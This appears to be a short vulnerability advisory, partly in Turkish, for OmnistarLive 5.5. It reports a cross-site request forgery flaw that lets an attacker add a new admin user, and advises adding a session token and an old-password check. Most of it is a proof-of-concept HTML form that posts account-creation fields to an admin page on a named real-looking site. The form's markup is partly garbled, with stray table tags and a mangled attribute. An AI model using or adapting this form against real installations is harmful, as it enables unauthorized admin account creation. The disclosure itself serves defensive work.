< ------------------- header data start ------------------- >

#############################################################

# Application Name :OmnistarLive

# Version : 5.5

# vulnerable Type : xsrf

# Infection : Yeni bir admin kullanicisi eklenebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form action=http://www.tbsitax.com/support81/admin/contacts.php method=post>

<input type=text name=’f_login’ value= size=40></td></tr>

<input type=password name=’f_password’ value= ></td></tr>

<input type=password name=’f_password2’ value= ></td></tr>

<input type=checkbox name=’f_subscribe’ value=’1’ checked ></td></tr>

<input type=text name=’contact_Email_’ value= size=40></td></tr>

<input type=hidden name=op value=add>

<input type=hidden name=id value=>

<input type=hidden name=uid value=>

<input type=image name=check Yasak Kelime#146;../admin/images/button_update.jpg’ border=0>

<input type=hidden name=check value=’update’></td></tr>

</form>
< -- bug code end of -- >